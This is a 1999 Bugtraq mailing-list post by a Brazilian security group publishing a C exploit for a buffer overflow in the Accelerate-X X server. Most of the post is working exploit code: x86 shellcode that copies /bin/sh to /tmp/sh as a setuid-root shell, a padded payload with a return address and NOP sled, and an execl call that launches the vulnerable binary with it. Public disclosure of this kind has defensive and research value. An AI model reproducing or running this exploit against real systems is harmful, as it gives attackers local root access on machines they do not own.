SDI exploit for Xaccel
Date: Wed, 30 Jun 1999 17:57:55 -0300
From: Thiago/c0nd0r <condor@SEKURE.ORG>
To: BUGTRAQ@netspace.org
Subject: SDI exploit for Xaccel
Here is the exploit for the Accelerate-X buffer overflow
discovered by the KSR[t] group (ksrt.org).
I've checked the '-query' argument and I found out that it will not
overwrite the return address thus not allowing the exploitation. The
argument '-indirect' behaves in the same way.
--- SDIaccelX.c ----
/*
* SDI linux exploit for Accelerate-X
* Sekure SDI - Brazilian Information Security Team
* by c0nd0r <condor@sekure.org>
*
* This script will exploit a vulnerability found by KSRT team
* in the Accelerate-X Xserver [<=5.0].
*
* --------------------------------------------------------------------
* The vulnerable buffer was small so we've changed the usual order to:
* [garbage][eip][lots nop][shellcode]
* BTW, I've also changed the code to execute, it will create a setuid
* shell owned by the superuser at /tmp/sh.
* --------------------------------------------------------------------
*
* Warning: DO NOT USE THIS TOOL FOR ILICIT ACTIVITIES! We take no
* responsability.
*
* Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
* marty (NORDO!), vader, fcon, slide, c_orb and
* specially to my sasazita. Also toxyn.org, pulhas.org,
* superbofh.org (Phibernet rox) and el8.org.
*
* Laughs - lame guys who hacked the senado/planalto.gov.br
* pay some attention to the site: securityfocus.com (good point).
* see you at #uground (irc.brasnet.org)
*/
#include <stdio.h>
/* generic shellcode */
char shellcode[] =
"\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
"\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
"\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
"\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff"
"/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";
main ( int argc, char *argv[] ) {
char buf[1024];
int x, y, offset=1000;
long addr;
int joe;
if (argc > 1)
offset = atoi ( argv[1]);
/* return address */
addr = (long) &joe + offset;
buf[0] = ':';
for ( x = 1; x < 53; x++)
buf[x] = 'X';
buf[x++] = (addr & 0x000000ff);
buf[x++] = (addr & 0x0000ff00) >> 8;
buf[x++] = (addr & 0x00ff0000) >> 16;
buf[x++] = (addr & 0xff000000) >> 24;
for ( ; x < 500; x++)
buf[x] = 0x90;
for ( y = 0; y < strlen(shellcode); y++, x++)
buf[x] = shellcode[y];
fprintf (stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%x\n\n",
offset, addr);
buf[strlen(buf)] = '\0';
execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);
// setenv ( "EGG", buf, 1);
// system ( "/bin/sh");
}
----- EOF ----------
-condor
www.sekure.org
s e k u r e
pgp key available at: http://condor.sekure.org/condor.asc